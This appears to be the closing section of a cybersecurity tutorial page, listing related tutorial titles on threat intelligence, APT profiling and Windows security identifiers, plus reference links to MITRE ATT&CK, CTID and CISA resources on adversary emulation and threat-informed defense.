Related Tutorials

• Cyber Threat Intelligence (CTI) Fundamentals: Sources, Types, and the Intelligence Lifecycle
• APT Profiling: How to Build a Comprehensive Adversary Profile from Open-Source Intelligence
• Access Tokens and Privileges: The Kernel’s Security Context
• SIDs and Security Descriptors: Identity in Windows Security
• Mapping CTI Reports to ATT&CK TTPs: A Step-by-Step Methodology

References

• Adversary Emulation Plans | MITRE ATT&CK®
• Get Started: Adversary Emulation and Red Teaming | MITRE ATT&CK®
• Get Started: Threat Intelligence | MITRE ATT&CK®
• Our Mission: Threat-Informed Defense | MITRE Center for Threat-Informed Defense (CTID)
• Adversary Emulation Library | MITRE Center for Threat-Informed Defense (CTID)
• Enabling Threat-Informed Cybersecurity: Evolving CISA’s Approach to Cyber Threat Information Sharing | CISA